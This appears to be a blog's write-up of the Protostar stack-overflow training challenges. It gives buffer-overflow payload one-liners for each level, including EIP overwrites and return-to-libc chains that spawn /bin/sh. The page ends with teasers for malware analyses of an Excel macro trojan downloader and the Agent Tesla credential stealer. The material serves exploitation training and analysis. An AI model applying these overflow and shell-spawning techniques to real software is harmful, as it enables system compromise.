Protostar - Stack Exploits

-
Protostar Solutions : 

[*] Stack 0 : 

The goal of this challenge is to modify the value of the variable modified



[*] Payload => python -c 'print "A"*200' | ./stack0


[*] Stack 1 : 

The goal of this challenge is to modify the value of the variable "modified" to 0x61626364



[*] Payload => $(python -c 'print "A"*64+"dcba"') | ./stack1


[*] Stack 2 : 

The goal of this challenge is to modify the value of the variable "modified" to 0x0d0a0d0a using the environment variables techniques



CMD ==> export GREENIE=$(python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"')

[*] Payload => ./stack2


 [*] Stack 3 : 

 Now that we are comfortable with overwriting local variables on the stack, this example challenges you to redirect the execution flow. The executable includes a function win() which is not normally called at this address:
user@protostar:/opt/protostar/bin$ objdump -D stack3 | grep win

08048424 <win>:

next step is to overwrite the EIP with this address:

 user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
[*] Stack 4 : 

 Instead of overwriting a function call, we'll be overwriting a return address.  When the function exits, it pops the current stack frame off and returns the saved frame pointer, so we need only overflow the address immediately following EBP.

 user@protostar:~$ objdump -d stack4 | grep win
080483f4 <win>:
user@protostar:~$ perl -e 'print "A"x76 . "\xf4\x83\x04\x08"' | ./stack4 
code flow successfully changed
Segmentation fault
user@protostar:~$ 
[*] Stack 6 :

  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf

cat <(python -c "print 'a'*80 + \xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'") - | ./stack6

 [*] Stack 7 : 
Just ret to another ret!
  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf
  • address of 'ret' instruction: 0x08048553
cat <(python -c "print 'a'*80 + '\x53\x85\x04\x08' + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'") -| ./stack7

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

Excel 4.0 macro Trojan Downloader

-
Image
Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c Sample Download Link:  beta.VirusBay.io Application Name: Microsoft Excel File Type: xls VirusTotal Score: 29/60 I came across this sample on VirusBay.io. I downloaded this malicious excel file on my VM for malware analysis. OLEVBA.py First thing I did analysis of VBA macro source code in excel file using OLETools. Command >  OLEVBA.py -a The result shows, macro will auto execute on opening file and it may run executable file may be using shell command and will download a file from remote server. The executable file name is  FBpKzqF.exe Document Property: XLM macro has been used in this file which is hidden. Steps To Make Macros Sheet Visible Step 1 I enabled it by right click on the spreadsheet which is open in Excel and selected Unhide… And then a popup shows the name of spreadsheet I will select to unhide. Here name of sheet is  SODXOFScMLy . Step 2 Along with this need to unblock the excel ...
Lire la suite

TROJAN AGENT TESLA – MALWARE ANALYSIS

-
Image
Hash – 077f75ef7fdb1663e70c33e20d8d7c4383fa13fd95517fab8023fce526bf3a25 Family : Agent Tesla Signature: Microsoft Visual C# v7.0/ Basic.NET Filename: UIhLdVHHlUAKoEOpjVAsXFlIQrgS.exe VirusTotal score: Malware behavior: Steal browser information (URL, Usernames, Passwords) Steal passwords for email clients. Steal FTP Clients Steal download manager passwords. Collect OS and hardware information. Browser Information: When I debug the malware executable, Initially it creates a SQLite database to store collected information from victims machine. Below are the tables getting created. Tables created: meta logins sqlite_sequence stats compromised_credentials found it collected browsers data (Google chrome), that includes accessed URLs and related usernames and passwords. database table  logins  stores all browser related information. Below are the table columns. Apart from this, malware also look for all different types of ...
Lire la suite

{ UIUCT#2017 } - REV 350P - ARE WE OUT OF THE WOODS YET?

-
It looks like this python script was run through a custom packer. It's just Python*, which means it must be easy to reverse, right? *v3 .6 .1 : 69 c0db5 https: //www.youtube.com/watch?v=y8qQsXpcZXA You are presented with the file  packed.py  that contains the following code: import marshal, zlib, base64, itertools def xor_strings (_left, _k) : out = b'' for l, r in zip(_left, itertools.cycle(_k)): out += (l ^ ord(r)).to_bytes( 1 , byteorder= 'big' ) return out def YET_eval_code (p1, p2) : YET_code = marshal.loads(zlib.decompress(xor_strings(base64.b64decode(p2), p1))) eval(YET_code) YET_eval_code( "YET" , b'IdkZDw77+o1N7Di7tKvNdbcGSyxAHBQCMDw12oRMcF9ROnVSwvKV+QF5+XW7ro70gu6ab7p1grlxNvbOLDMNXJpNfMagxOrwCrApxe8WxToZJ7Fo1LSzaO87HkVHachzv7ItMwuLq4nI5KBzqkyYmZaLf6NnIUN7OjslBoVvqbufNX+mk6G33qpKTDwzrwa5znSK1ARqs3rO2ayzgCgJFhtzrHHI5AvrFfqYL9brp6R76oobxtoLPuobrJa/qtJ9aEzLRviUqpozgaGn9b3hZzzJ1FgKoTprUzpjRKSqP...
Lire la suite